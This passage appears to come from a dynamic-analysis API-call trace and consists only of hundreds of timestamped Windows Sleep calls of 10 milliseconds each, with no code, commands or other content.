(dwMilliseconds=0xa) [0103.393] Sleep (dwMilliseconds=0xa) [0103.408] Sleep (dwMilliseconds=0xa) [0103.424] Sleep (dwMilliseconds=0xa) [0103.441] Sleep (dwMilliseconds=0xa) [0103.455] Sleep (dwMilliseconds=0xa) [0103.471] Sleep (dwMilliseconds=0xa) [0103.486] Sleep (dwMilliseconds=0xa) [0103.534] Sleep (dwMilliseconds=0xa) [0103.550] Sleep (dwMilliseconds=0xa) [0103.564] Sleep (dwMilliseconds=0xa) [0103.580] Sleep (dwMilliseconds=0xa) [0103.596] Sleep (dwMilliseconds=0xa) [0103.616] Sleep (dwMilliseconds=0xa) [0103.627] Sleep (dwMilliseconds=0xa) [0103.643] Sleep (dwMilliseconds=0xa) [0103.690] Sleep (dwMilliseconds=0xa) [0103.712] Sleep (dwMilliseconds=0xa) [0103.720] Sleep (dwMilliseconds=0xa) [0103.736] Sleep (dwMilliseconds=0xa) [0103.757] Sleep (dwMilliseconds=0xa) [0103.769] Sleep (dwMilliseconds=0xa) [0103.783] Sleep (dwMilliseconds=0xa) [0103.800] Sleep (dwMilliseconds=0xa) [0103.814] Sleep (dwMilliseconds=0xa) [0103.862] Sleep (dwMilliseconds=0xa) [0103.879] Sleep (dwMilliseconds=0xa) [0103.894] Sleep (dwMilliseconds=0xa) [0103.909] Sleep (dwMilliseconds=0xa) [0103.923] Sleep (dwMilliseconds=0xa) [0103.939] Sleep (dwMilliseconds=0xa) [0103.954] Sleep (dwMilliseconds=0xa) [0103.970] Sleep (dwMilliseconds=0xa) [0103.985] Sleep (dwMilliseconds=0xa) [0104.032] Sleep (dwMilliseconds=0xa) [0104.067] Sleep (dwMilliseconds=0xa) [0104.079] Sleep (dwMilliseconds=0xa) [0104.095] Sleep (dwMilliseconds=0xa) [0104.110] Sleep (dwMilliseconds=0xa) [0104.127] Sleep (dwMilliseconds=0xa) [0104.142] Sleep (dwMilliseconds=0xa) [0104.188] Sleep (dwMilliseconds=0xa) [0104.207] Sleep (dwMilliseconds=0xa) [0104.220] Sleep (dwMilliseconds=0xa) [0104.236] Sleep (dwMilliseconds=0xa) [0104.251] Sleep (dwMilliseconds=0xa) [0104.266] Sleep (dwMilliseconds=0xa) [0104.289] Sleep (dwMilliseconds=0xa) [0104.298] Sleep (dwMilliseconds=0xa) [0104.313] Sleep (dwMilliseconds=0xa) [0104.361] Sleep (dwMilliseconds=0xa) [0104.395] Sleep (dwMilliseconds=0xa) [0104.407] Sleep (dwMilliseconds=0xa) [0104.422] Sleep (dwMilliseconds=0xa) [0104.440] Sleep (dwMilliseconds=0xa) [0104.455] Sleep (dwMilliseconds=0xa) [0104.469] Sleep (dwMilliseconds=0xa) [0104.485] Sleep (dwMilliseconds=0xa) [0104.500] Sleep (dwMilliseconds=0xa) [0104.547] Sleep (dwMilliseconds=0xa) [0104.563] Sleep (dwMilliseconds=0xa) [0104.578] Sleep (dwMilliseconds=0xa) [0104.594] Sleep (dwMilliseconds=0xa) [0104.614] Sleep (dwMilliseconds=0xa) [0104.728] Sleep (dwMilliseconds=0xa) [0104.736] Sleep (dwMilliseconds=0xa) [0104.750] Sleep (dwMilliseconds=0xa) [0104.797] Sleep (dwMilliseconds=0xa) [0104.813] Sleep (dwMilliseconds=0xa) [0104.829] Sleep (dwMilliseconds=0xa) [0104.844] Sleep (dwMilliseconds=0xa) [0104.859] Sleep (dwMilliseconds=0xa) [0104.875] Sleep (dwMilliseconds=0xa) [0104.890] Sleep (dwMilliseconds=0xa) [0104.907] Sleep (dwMilliseconds=0xa) [0104.953] Sleep (dwMilliseconds=0xa) [0104.971] Sleep (dwMilliseconds=0xa) [0104.993] Sleep (dwMilliseconds=0xa) [0105.008] Sleep (dwMilliseconds=0xa) [0105.019] Sleep (dwMilliseconds=0xa) [0105.036] Sleep (dwMilliseconds=0xa) [0105.049] Sleep (dwMilliseconds=0xa) [0105.064] Sleep (dwMilliseconds=0xa) [0105.212] Sleep (dwMilliseconds=0xa) [0105.244] Sleep (dwMilliseconds=0xa) [0105.249] Sleep (dwMilliseconds=0xa) [0105.265] Sleep (dwMilliseconds=0xa) [0105.280] Sleep (dwMilliseconds=0xa) [0105.298] Sleep (dwMilliseconds=0xa) [0105.314] Sleep (dwMilliseconds=0xa) [0105.327] Sleep (dwMilliseconds=0xa) [0105.343] Sleep (dwMilliseconds=0xa) [0105.395] Sleep (dwMilliseconds=0xa) [0105.417] Sleep (dwMilliseconds=0xa) [0105.421] Sleep (dwMilliseconds=0xa) [0105.441] Sleep (dwMilliseconds=0xa) [0105.452] Sleep (dwMilliseconds=0xa) [0105.468] Sleep (dwMilliseconds=0xa) [0105.483] Sleep (dwMilliseconds=0xa) [0105.500] Sleep (dwMilliseconds=0xa) [0105.516] Sleep (dwMilliseconds=0xa) [0105.562] Sleep (dwMilliseconds=0xa) [0105.586] Sleep (dwMilliseconds=0xa) [0105.608] Sleep (dwMilliseconds=0xa) [0105.625] Sleep (dwMilliseconds=0xa) [0105.639] Sleep (dwMilliseconds=0xa) [0105.655] Sleep (dwMilliseconds=0xa) [0105.670] Sleep (dwMilliseconds=0xa) [0105.687] Sleep (dwMilliseconds=0xa) [0105.734] Sleep (dwMilliseconds=0xa) [0105.760] Sleep (dwMilliseconds=0xa) [0105.764] Sleep (dwMilliseconds=0xa) [0105.780] Sleep (dwMilliseconds=0xa) [0105.796] Sleep (dwMilliseconds=0xa) [0105.821] Sleep (dwMilliseconds=0xa) [0105.826] Sleep (dwMilliseconds=0xa) [0105.842] Sleep (dwMilliseconds=0xa) [0105.858] Sleep (dwMilliseconds=0xa) [0105.910] Sleep (dwMilliseconds=0xa) [0105.927] Sleep (dwMilliseconds=0xa) [0105.937] Sleep (dwMilliseconds=0xa) [0105.951] Sleep (dwMilliseconds=0xa) [0105.967] Sleep (dwMilliseconds=0xa) [0105.982] Sleep (dwMilliseconds=0xa) [0105.998] Sleep (dwMilliseconds=0xa) [0106.017] Sleep (dwMilliseconds=0xa) [0106.029] Sleep (dwMilliseconds=0xa) [0106.061] Sleep (dwMilliseconds=0xa) [0106.083] Sleep (dwMilliseconds=0xa) [0106.093] Sleep (dwMilliseconds=0xa) [0106.108] Sleep (dwMilliseconds=0xa) [0106.124] Sleep (dwMilliseconds=0xa) [0106.138] Sleep (dwMilliseconds=0xa) [0106.154] Sleep (dwMilliseconds=0xa) [0106.170] Sleep (dwMilliseconds=0xa) [0106.341] Sleep (dwMilliseconds=0xa) [0106.389] Sleep (dwMilliseconds=0xa) [0106.410] Sleep (dwMilliseconds=0xa) [0106.421] Sleep (dwMilliseconds=0xa) [0106.435] Sleep (dwMilliseconds=0xa) [0106.454] Sleep (dwMilliseconds=0xa) [0106.466] Sleep (dwMilliseconds=0xa) [0106.483] Sleep (dwMilliseconds=0xa) [0106.497] Sleep (dwMilliseconds=0xa) [0106.513] Sleep (dwMilliseconds=0xa) [0106.565] Sleep (dwMilliseconds=0xa) [0106.588] Sleep (dwMilliseconds=0xa) [0106.591] Sleep (dwMilliseconds=0xa) [0106.610] Sleep (dwMilliseconds=0xa) [0106.622] Sleep (dwMilliseconds=0xa) [0106.638] Sleep (dwMilliseconds=0xa) [0106.653] Sleep (dwMilliseconds=0xa) [0106.672] Sleep (dwMilliseconds=0xa) [0106.684] Sleep (dwMilliseconds=0xa) [0106.731] Sleep (dwMilliseconds=0xa) [0106.751] Sleep (dwMilliseconds=0xa) [0106.778] Sleep (dwMilliseconds=0xa) [0106.793] Sleep (dwMilliseconds=0xa) [0106.809] Sleep (dwMilliseconds=0xa) [0106.825] Sleep (dwMilliseconds=0xa) [0106.840] Sleep (dwMilliseconds=0xa) [0106.856] Sleep (dwMilliseconds=0xa) [0106.903] Sleep (dwMilliseconds=0xa) [0106.918] Sleep (dwMilliseconds=0xa) [0106.934] Sleep (dwMilliseconds=0xa) [0106.950] Sleep (dwMilliseconds=0xa) [0106.965] Sleep (dwMilliseconds=0xa) [0106.981] Sleep (dwMilliseconds=0xa) [0106.997] Sleep (dwMilliseconds=0xa) [0107.014] Sleep (dwMilliseconds=0xa) [0107.062] Sleep (dwMilliseconds=0xa) [0107.081] Sleep (dwMilliseconds=0xa) [0107.091] Sleep (dwMilliseconds=0xa) [0107.105] Sleep (dwMilliseconds=0xa) [0107.121] Sleep (dwMilliseconds=0xa) [0107.137] Sleep (dwMilliseconds=0xa) [0107.152] Sleep (dwMilliseconds=0xa) [0107.168] Sleep (dwMilliseconds=0xa) [0107.184] Sleep (dwMilliseconds=0xa) [0107.231] Sleep (dwMilliseconds=0xa) [0107.246] Sleep (dwMilliseconds=0xa) [0107.262] Sleep (dwMilliseconds=0xa) [0107.277] Sleep (dwMilliseconds=0xa) [0107.294] Sleep (dwMilliseconds=0xa) [0107.309] Sleep (dwMilliseconds=0xa) [0107.325] Sleep (dwMilliseconds=0xa) [0107.339] Sleep (dwMilliseconds=0xa) [0107.401] Sleep (dwMilliseconds=0xa) [0107.446] Sleep (dwMilliseconds=0xa) [0107.449] Sleep (dwMilliseconds=0xa) [0107.465] Sleep (dwMilliseconds=0xa) [0107.480] Sleep (dwMilliseconds=0xa) [0107.497] Sleep (dwMilliseconds=0xa) [0107.527] Sleep (dwMilliseconds=0xa) [0107.574] Sleep (dwMilliseconds=0xa) [0107.589] Sleep (dwMilliseconds=0xa) [0107.605] Sleep (dwMilliseconds=0xa) [0107.621] Sleep (dwMilliseconds=0xa) [0107.636] Sleep (dwMilliseconds=0xa) [0107.653] Sleep (dwMilliseconds=0xa) [0107.667] Sleep (dwMilliseconds=0xa) [0107.688] Sleep (dwMilliseconds=0xa) [0107.750] Sleep (dwMilliseconds=0xa) [0107.784] Sleep (dwMilliseconds=0xa) [0107.792] Sleep (dwMilliseconds=0xa) [0107.807] Sleep (dwMilliseconds=0xa) [0107.823] Sleep (dwMilliseconds=0xa) [0107.839] Sleep (dwMilliseconds=0xa) [0107.854] Sleep (dwMilliseconds=0xa) [0107.870] Sleep (dwMilliseconds=0xa) [0107.931] Sleep (dwMilliseconds=0xa) [0107.935] Sleep (dwMilliseconds=0xa) [0107.948] Sleep (dwMilliseconds=0xa) [0107.969] Sleep (dwMilliseconds=0xa) [0107.979] Sleep (dwMilliseconds=0xa) [0108.005] Sleep (dwMilliseconds=0xa) [0108.026] Sleep (dwMilliseconds=0xa) [0108.042] Sleep (dwMilliseconds=0xa) [0108.089] Sleep (dwMilliseconds=0xa) [0108.135] Sleep (dwMilliseconds=0xa) [0108.152] Sleep (dwMilliseconds=0xa) [0108.167] Sleep (dwMilliseconds=0xa) [0108.182] Sleep (dwMilliseconds=0xa) [0108.197] Sleep (dwMilliseconds=0xa) [0108.213] Sleep (dwMilliseconds=0xa) [0108.261] Sleep (dwMilliseconds=0xa) [0108.278] Sleep (dwMilliseconds=0xa) [0108.291] Sleep (dwMilliseconds=0xa) [0108.307] Sleep (dwMilliseconds=0xa) [0108.322] Sleep (dwMilliseconds=0xa) [0108.338] Sleep (dwMilliseconds=0xa) [0108.355] Sleep (dwMilliseconds=0xa) [0108.394] Sleep (dwMilliseconds=0xa) [0108.432] Sleep (dwMilliseconds=0xa) [0108.461] Sleep (dwMilliseconds=0xa) [0108.463] Sleep (dwMilliseconds=0xa) [0108.478] Sleep (dwMilliseconds=0xa) [0108.497] Sleep (dwMilliseconds=0xa) [0108.509] Sleep (dwMilliseconds=0xa) [0108.525] Sleep (dwMilliseconds=0xa) [0108.712] Sleep (dwMilliseconds=0xa) [0108.732] Sleep (dwMilliseconds=0xa) [0108.744] Sleep (dwMilliseconds=0xa) [0108.759] Sleep (dwMilliseconds=0xa) [0108.775] Sleep (dwMilliseconds=0xa) [0108.791] Sleep (dwMilliseconds=0xa) [0108.806] Sleep (dwMilliseconds=0xa) [0108.822] Sleep (dwMilliseconds=0xa) [0108.841] Sleep (dwMilliseconds=0xa) [0108.890] Sleep (dwMilliseconds=0xa) [0108.911] Sleep (dwMilliseconds=0xa) [0108.915] Sleep (dwMilliseconds=0xa) [0108.932] Sleep (dwMilliseconds=0xa) [0108.946] Sleep (dwMilliseconds=0xa) [0108.962] Sleep (dwMilliseconds=0xa) [0108.982] Sleep (dwMilliseconds=0xa) [0108.994] Sleep (dwMilliseconds=0xa) [0109.013] Sleep (dwMilliseconds=0xa) [0109.055] Sleep (dwMilliseconds=0xa) [0109.071] Sleep (dwMilliseconds=0xa) [0109.087] Sleep (dwMilliseconds=0xa) [0109.103] Sleep (dwMilliseconds=0xa) [0109.118] Sleep (dwMilliseconds=0xa) [0109.147] Sleep (dwMilliseconds=0xa) [0109.149] Sleep (dwMilliseconds=0xa) [0109.165] Sleep (dwMilliseconds=0xa) [0109.213] Sleep (dwMilliseconds=0xa) [0109.234] Sleep (dwMilliseconds=0xa) [0109.243] Sleep (dwMilliseconds=0xa) [0109.258] Sleep (dwMilliseconds=0xa) [0109.274] Sleep (dwMilliseconds=0xa) [0109.290] Sleep (dwMilliseconds=0xa) [0109.305] Sleep (dwMilliseconds=0xa) [0109.322] Sleep (dwMilliseconds=0xa) [0109.336] Sleep (dwMilliseconds=0xa) [0109.383] Sleep (dwMilliseconds=0xa) [0109.399] Sleep (dwMilliseconds=0xa) [0109.414] Sleep (dwMilliseconds=0xa) [0109.431] Sleep (dwMilliseconds=0xa) [0109.449] Sleep (dwMilliseconds=0xa) [0109.461] Sleep (dwMilliseconds=0xa) [0109.498] Sleep (dwMilliseconds=0xa) [0109.508] Sleep (dwMilliseconds=0xa) [0109.555] Sleep (dwMilliseconds=0xa) [0109.570] Sleep (dwMilliseconds=0xa) [0109.586] Sleep (dwMilliseconds=0xa) [0109.601] Sleep (dwMilliseconds=0xa) [0109.617] Sleep (dwMilliseconds=0xa) [0109.633] Sleep (dwMilliseconds=0xa) [0109.648] Sleep (dwMilliseconds=0xa) [0109.665] Sleep (dwMilliseconds=0xa) [0109.711] Sleep (dwMilliseconds=0xa) [0109.731] Sleep (dwMilliseconds=0xa) [0109.742] Sleep (dwMilliseconds=0xa) [0109.758] Sleep (dwMilliseconds=0xa) [0109.774] Sleep (dwMilliseconds=0xa) [0109.800] Sleep (dwMilliseconds=0xa) [0109.804] Sleep (dwMilliseconds=0xa) [0109.820] Sleep (dwMilliseconds=0xa) [0109.835] Sleep (dwMilliseconds=0xa) [0109.891] Sleep (dwMilliseconds=0xa) [0109.908] Sleep (dwMilliseconds=0xa) [0109.913] Sleep (dwMilliseconds=0xa) [0109.929] Sleep (dwMilliseconds=0xa) [0109.945] Sleep (dwMilliseconds=0xa) [0109.960] Sleep (dwMilliseconds=0xa) [0109.976] Sleep (dwMilliseconds=0xa) [0109.993] Sleep (dwMilliseconds=0xa) [0110.008] Sleep (dwMilliseconds=0xa) [0110.054] Sleep (dwMilliseconds=0xa) [0110.073] Sleep (dwMilliseconds=0xa) [0110.085] Sleep (dwMilliseconds=0xa) [0110.102] Sleep (dwMilliseconds=0xa) [0110.116] Sleep (dwMilliseconds=0xa) [0110.132] Sleep (dwMilliseconds=0xa) [0110.147] Sleep (dwMilliseconds=0xa) [0110.163] Sleep (dwMilliseconds=0xa) [0110.179] Sleep (dwMilliseconds=0xa) [0110.225] Sleep (dwMilliseconds=0xa) [0110.241] Sleep (dwMilliseconds=0xa) [0110.257] Sleep (dwMilliseconds=0xa) [0110.272] Sleep (dwMilliseconds=0xa) [0110.288] Sleep (dwMilliseconds=0xa) [0110.303] Sleep (dwMilliseconds=0xa) [0110.320] Sleep (dwMilliseconds=0xa) [0110.335] Sleep (dwMilliseconds=0xa) [0110.382] Sleep (dwMilliseconds=0xa) [0110.398] Sleep (dwMilliseconds=0xa) [0110.413] Sleep (dwMilliseconds=0xa) [0110.429] Sleep (dwMilliseconds=0xa) [0110.444] Sleep (dwMilliseconds=0xa) [0110.464] Sleep (dwMilliseconds=0xa) [0110.475] Sleep (dwMilliseconds=0xa) [0110.506] Sleep (dwMilliseconds=0xa) [0110.507] Sleep (dwMilliseconds=0xa) [0110.555] Sleep (dwMilliseconds=0xa) [0110.576] Sleep (dwMilliseconds=0xa) [0110.584] Sleep (dwMilliseconds=0xa) [0110.600] Sleep (dwMilliseconds=0xa) [0110.615] Sleep (dwMilliseconds=0xa) [0110.631] Sleep (dwMilliseconds=0xa) [0110.647] Sleep (dwMilliseconds=0xa) [0110.663] Sleep (dwMilliseconds=0xa) [0110.678] Sleep (dwMilliseconds=0xa) [0110.725] Sleep (dwMilliseconds=0xa) [0110.740] Sleep (dwMilliseconds=0xa) [0110.756] Sleep (dwMilliseconds=0xa) [0110.772] Sleep (dwMilliseconds=0xa) [0110.798] Sleep (dwMilliseconds=0xa) [0110.803] Sleep (dwMilliseconds=0xa) [0110.818] Sleep (dwMilliseconds=0xa) [0110.834] Sleep (dwMilliseconds=0xa) [0110.850] Sleep (dwMilliseconds=0xa) [0110.896] Sleep (dwMilliseconds=0xa) [0110.914] Sleep (dwMilliseconds=0xa) [0110.927] Sleep (dwMilliseconds=0xa) [0110.943] Sleep (dwMilliseconds=0xa) [0110.959] Sleep (dwMilliseconds=0xa) [0110.974] Sleep (dwMilliseconds=0xa) [0110.991] Sleep (dwMilliseconds=0xa) [0111.006] Sleep (dwMilliseconds=0xa) [0111.021] Sleep (dwMilliseconds=0xa) [0111.068] Sleep (dwMilliseconds=0xa) [0111.097] Sleep (dwMilliseconds=0xa) [0111.104] Sleep (dwMilliseconds=0xa) [0111.115] Sleep (dwMilliseconds=0xa) [0111.131] Sleep (dwMilliseconds=0xa) [0111.146] Sleep (dwMilliseconds=0xa) [0111.161] Sleep (dwMilliseconds=0xa) [0111.179] Sleep (dwMilliseconds=0xa) [0111.193] Sleep (dwMilliseconds=0xa) [0111.241] Sleep (dwMilliseconds=0xa) [0111.270] Sleep (dwMilliseconds=0xa) [0111.271] Sleep (dwMilliseconds=0xa) [0111.287] Sleep (dwMilliseconds=0xa) [0111.302] Sleep (dwMilliseconds=0xa) [0111.319] Sleep (dwMilliseconds=0xa) [0111.333] Sleep (dwMilliseconds=0xa) [0111.349] Sleep (dwMilliseconds=0xa) [0111.364] Sleep (dwMilliseconds=0xa) [0111.414] Sleep (dwMilliseconds=0xa) [0111.439] Sleep (dwMilliseconds=0xa) [0111.443] Sleep (dwMilliseconds=0xa) [0111.458] Sleep (dwMilliseconds=0xa) [0111.473] Sleep (dwMilliseconds=0xa) [0111.512] Sleep (dwMilliseconds=0xa) [0111.521] Sleep (dwMilliseconds=0xa) [0111.537] Sleep (dwMilliseconds=0xa) [0111.573] Sleep (dwMilliseconds=0xa) [0111.596] Sleep (dwMilliseconds=0xa) [0111.598] Sleep (dwMilliseconds=0xa) [0111.614] Sleep (dwMilliseconds=0xa) [0111.630] Sleep (dwMilliseconds=0xa) [0111.646] Sleep (dwMilliseconds=0xa) [0111.661] Sleep (dwMilliseconds=0xa) [0111.677] Sleep (dwMilliseconds=0xa) [0111.692] Sleep (dwMilliseconds=0xa) [0111.741] Sleep (dwMilliseconds=0xa) [0111.754] Sleep (dwMilliseconds=0xa) [0111.770] Sleep (dwMilliseconds=0xa) [0111.785] Sleep (dwMilliseconds=0xa) [0111.805] Sleep (dwMilliseconds=0xa) [0111.817] Sleep (dwMilliseconds=0xa) [0111.832] Sleep (dwMilliseconds=0xa) [0111.848] Sleep (dwMilliseconds=0xa) [0111.909] Sleep (dwMilliseconds=0xa) [0111.920] Sleep (dwMilliseconds=0xa) [0111.929] Sleep (dwMilliseconds=0xa) [0111.942] Sleep (dwMilliseconds=0xa) [0111.962] Sleep (dwMilliseconds=0xa) [0111.973] Sleep (dwMilliseconds=0xa) [0111.988] Sleep (dwMilliseconds=0xa) [0112.008] Sleep (dwMilliseconds=0xa) [0112.019] Sleep (dwMilliseconds=0xa) [0112.069] Sleep (dwMilliseconds=0xa) [0112.099] Sleep (dwMilliseconds=0xa) [0112.113] Sleep (dwMilliseconds=0xa) [0112.129] Sleep (dwMilliseconds=0xa) [0112.144] Sleep (dwMilliseconds=0xa) [0112.163] Sleep (dwMilliseconds=0xa) [0112.175] Sleep (dwMilliseconds=0xa) [0112.195] Sleep (dwMilliseconds=0xa) [0112.239] Sleep (dwMilliseconds=0xa) [0112.271] Sleep (dwMilliseconds=0xa) [0112.290] Sleep (dwMilliseconds=0xa) [0112.303] Sleep (dwMilliseconds=0xa) [0112.317] Sleep (dwMilliseconds=0xa) [0112.335] Sleep (dwMilliseconds=0xa) [0112.347] Sleep (dwMilliseconds=0xa) [0112.365] Sleep (dwMilliseconds=0xa) [0112.411] Sleep (dwMilliseconds=0xa) [0112.439] Sleep (dwMilliseconds=0xa) [0112.442] Sleep (dwMilliseconds=0xa) [0112.456] Sleep (dwMilliseconds=0xa) [0112.472] Sleep (dwMilliseconds=0xa) [0112.504] Sleep (dwMilliseconds=0xa) [0112.519] Sleep (dwMilliseconds=0xa) [0112.540] Sleep (dwMilliseconds=0xa) [0112.582] Sleep (dwMilliseconds=0xa) [0112.604] Sleep (dwMilliseconds=0xa) [0112.612] Sleep (dwMilliseconds=0xa) [0112.628] Sleep (dwMilliseconds=0xa) [0112.644] Sleep (dwMilliseconds=0xa) [0112.659] Sleep (dwMilliseconds=0xa) [0112.680] Sleep (dwMilliseconds=0xa) [0112.692] Sleep (dwMilliseconds=0xa) [0112.706] Sleep (dwMilliseconds=0xa) [0112.756] Sleep (dwMilliseconds=0xa) [0112.777] Sleep (dwMilliseconds=0xa) [0112.784] Sleep (dwMilliseconds=0xa) [0112.802] Sleep (dwMilliseconds=0xa) [0112.817] Sleep (dwMilliseconds=0xa) [0112.832] Sleep (dwMilliseconds=0xa) [0112.847] Sleep (dwMilliseconds=0xa) [0112.862] Sleep (dwMilliseconds=0xa) [0112.881] Sleep (dwMilliseconds=0xa) [0112.936] Sleep (dwMilliseconds=0xa) [0112.944] Sleep (dwMilliseconds=0xa) [0112.956] Sleep (dwMilliseconds=0xa) [0112.971] Sleep (dwMilliseconds=0xa) [0112.987] Sleep (dwMilliseconds=0xa) [0113.004] Sleep (dwMilliseconds=0xa) [0113.028] Sleep (dwMilliseconds=0xa) [0113.036] Sleep (dwMilliseconds=0xa) [0113.049] Sleep (dwMilliseconds=0xa) [0113.096] Sleep (dwMilliseconds=0xa) [0113.112] Sleep (dwMilliseconds=0xa) [0113.127] Sleep (dwMilliseconds=0xa) [0113.151] Sleep (dwMilliseconds=0xa) [0113.159] Sleep (dwMilliseconds=0xa) [0113.174] Sleep (dwMilliseconds=0xa) [0113.190] Sleep (dwMilliseconds=0xa) [0113.207] Sleep (dwMilliseconds=0xa) [0113.221] Sleep (dwMilliseconds=0xa) [0113.253] Sleep (dwMilliseconds=0xa) [0113.275] Sleep (dwMilliseconds=0xa) [0113.283] Sleep (dwMilliseconds=0xa) [0113.299] Sleep (dwMilliseconds=0xa) [0113.316] Sleep (dwMilliseconds=0xa) [0113.330] Sleep (dwMilliseconds=0xa) [0113.345] Sleep (dwMilliseconds=0xa) [0113.361] Sleep (dwMilliseconds=0xa) [0113.378] Sleep (dwMilliseconds=0xa) [0113.424] Sleep (dwMilliseconds=0xa) [0113.439] Sleep (dwMilliseconds=0xa) [0113.460] Sleep (dwMilliseconds=0xa) [0113.471] Sleep (dwMilliseconds=0xa) [0113.507] Sleep (dwMilliseconds=0xa) [0113.517] Sleep (dwMilliseconds=0xa) [0113.533] Sleep (dwMilliseconds=0xa) [0113.580] Sleep (dwMilliseconds=0xa) [0113.597] Sleep (dwMilliseconds=0xa) [0113.611] Sleep (dwMilliseconds=0xa) [0113.626] Sleep (dwMilliseconds=0xa) [0113.642] Sleep (dwMilliseconds=0xa) [0113.657] Sleep (dwMilliseconds=0xa) [0113.676] Sleep (dwMilliseconds=0xa) [0113.689] Sleep (dwMilliseconds=0xa) [0113.706] Sleep (dwMilliseconds=0xa) [0113.751] Sleep (dwMilliseconds=0xa) [0113.778] Sleep (dwMilliseconds=0xa) [0113.782] Sleep (dwMilliseconds=0xa) [0113.807] Sleep (dwMilliseconds=0xa) [0113.814] Sleep (dwMilliseconds=0xa) [0113.829] Sleep (dwMilliseconds=0xa) [0113.848] Sleep (dwMilliseconds=0xa) [0113.860] Sleep (dwMilliseconds=0xa) [0113.877] Sleep (dwMilliseconds=0xa) [0113.923] Sleep (dwMilliseconds=0xa) [0113.941] Sleep (dwMilliseconds=0xa) [0113.954] Sleep (dwMilliseconds=0xa) [0113.969] Sleep (dwMilliseconds=0xa) [0113.989] Sleep (dwMilliseconds=0xa) [0114.001] Sleep (dwMilliseconds=0xa) [0114.016] Sleep (dwMilliseconds=0xa) [0114.032] Sleep (dwMilliseconds=0xa) [0114.051] Sleep (dwMilliseconds=0xa) [0114.097] Sleep (dwMilliseconds=0xa) [0114.130] Sleep (dwMilliseconds=0xa) [0114.141] Sleep (dwMilliseconds=0xa) [0114.157] Sleep (dwMilliseconds=0xa) [0114.172] Sleep (dwMilliseconds=0xa) [0114.193] Sleep (dwMilliseconds=0xa) [0114.204] Sleep (dwMilliseconds=0xa) [0114.219] Sleep (dwMilliseconds=0xa) [0114.235] Sleep (dwMilliseconds=0xa) [0114.281] Sleep (dwMilliseconds=0xa) [0114.299] Sleep (dwMilliseconds=0xa) [0114.313] Sleep (dwMilliseconds=0xa) [0114.330] Sleep (dwMilliseconds=0xa) [0114.345] Sleep (dwMilliseconds=0xa) [0114.359] Sleep (dwMilliseconds=0xa) [0114.375] Sleep (dwMilliseconds=0xa) [0114.399] Sleep (dwMilliseconds=0xa) [0114.406] Sleep (dwMilliseconds=0xa) [0114.438] Sleep (dwMilliseconds=0xa) [0114.460] Sleep (dwMilliseconds=0xa) [0114.470] Sleep (dwMilliseconds=0xa) [0114.497] Sleep (dwMilliseconds=0xa) [0114.500] Sleep (dwMilliseconds=0xa) [0114.515] Sleep (dwMilliseconds=0xa) [0114.531] Sleep (dwMilliseconds=0xa) [0114.547] Sleep (dwMilliseconds=0xa) [0114.562] Sleep (dwMilliseconds=0xa) [0114.610] Sleep (dwMilliseconds=0xa) [0114.625] Sleep (dwMilliseconds=0xa) [0114.640] Sleep (dwMilliseconds=0xa) [0114.656] Sleep (dwMilliseconds=0xa) [0114.672] Sleep (dwMilliseconds=0xa) [0114.687] Sleep (dwMilliseconds=0xa) [0114.703] Sleep (dwMilliseconds=0xa) [0114.727] Sleep (dwMilliseconds=0xa) [0114.765] Sleep (dwMilliseconds=0xa) [0114.782] Sleep (dwMilliseconds=0xa) [0114.807] Sleep (dwMilliseconds=0xa) [0114.812] Sleep (dwMilliseconds=0xa) [0114.830] Sleep (dwMilliseconds=0xa) [0114.843] Sleep (dwMilliseconds=0xa) [0114.859] Sleep (dwMilliseconds=0xa) [0114.874] Sleep (dwMilliseconds=0xa) [0114.890] Sleep (dwMilliseconds=0xa) [0114.943] Sleep (dwMilliseconds=0xa) [0114.963] Sleep (dwMilliseconds=0xa) [0114.968] Sleep (dwMilliseconds=0xa) [0114.983] Sleep (dwMilliseconds=0xa) [0114.999] Sleep (dwMilliseconds=0xa) [0115.015] Sleep (dwMilliseconds=0xa) [0115.030] Sleep (dwMilliseconds=0xa) [0115.047] Sleep (dwMilliseconds=0xa) [0115.061] Sleep (dwMilliseconds=0xa) [0115.108] Sleep (dwMilliseconds=0xa) [0115.130] Sleep (dwMilliseconds=0xa) [0115.139] Sleep (dwMilliseconds=0xa) [0115.155] Sleep (dwMilliseconds=0xa) [0115.179] Sleep (dwMilliseconds=0xa) [0115.186] Sleep (dwMilliseconds=0xa) [0115.202] Sleep (dwMilliseconds=0xa) [0115.220] Sleep (dwMilliseconds=0xa) [0115.233] Sleep (dwMilliseconds=0xa) [0115.280] Sleep (dwMilliseconds=0xa) [0115.300] Sleep (dwMilliseconds=0xa) [0115.311] Sleep (dwMilliseconds=0xa) [0115.327] Sleep (dwMilliseconds=0xa) [0115.342] Sleep (dwMilliseconds=0xa) [0115.359] Sleep (dwMilliseconds=0xa) [0115.374] Sleep (dwMilliseconds=0xa) [0115.391] Sleep (dwMilliseconds=0xa) [0115.405] Sleep (dwMilliseconds=0xa) [0115.452] Sleep (dwMilliseconds=0xa) [0115.467] Sleep (dwMilliseconds=0xa) [0115.498] Sleep (dwMilliseconds=0xa) [0115.498] Sleep (dwMilliseconds=0xa) [0115.514] Sleep (dwMilliseconds=0xa) [0115.529] Sleep (dwMilliseconds=0xa) [0115.548] Sleep (dwMilliseconds=0xa) [0115.561] Sleep (dwMilliseconds=0xa) [0115.614] Sleep (dwMilliseconds=0xa) [0115.629] Sleep (dwMilliseconds=0xa) [0115.639] Sleep (dwMilliseconds=0xa) [0115.654] Sleep (dwMilliseconds=0xa) [0115.670] Sleep (dwMilliseconds=0xa) [0115.685] Sleep (dwMilliseconds=0xa) [0115.701] Sleep (dwMilliseconds=0xa) [0115.718] Sleep (dwMilliseconds=0xa) [0115.732] Sleep (dwMilliseconds=0xa) [0115.779] Sleep (dwMilliseconds=0xa) [0115.798] Sleep (dwMilliseconds=0xa) [0115.811] Sleep (dwMilliseconds=0xa) [0115.828] Sleep (dwMilliseconds=0xa) [0115.841] Sleep (dwMilliseconds=0xa) [0115.857] Sleep (dwMilliseconds=0xa) [0115.873] Sleep (dwMilliseconds=0xa) [0115.889] Sleep (dwMilliseconds=0xa) [0115.904] Sleep (dwMilliseconds=0xa) [0115.951] Sleep (dwMilliseconds=0xa) [0115.966] Sleep (dwMilliseconds=0xa) [0115.982] Sleep (dwMilliseconds=0xa) [0115.998] Sleep (dwMilliseconds=0xa) [0116.013] Sleep (dwMilliseconds=0xa) [0116.029] Sleep (dwMilliseconds=0xa) [0116.044] Sleep (dwMilliseconds=0xa) [0116.060] Sleep (dwMilliseconds=0xa) [0116.108] Sleep (dwMilliseconds=0xa) [0116.128] Sleep (dwMilliseconds=0xa) [0116.138] Sleep (dwMilliseconds=0xa) [0116.154] 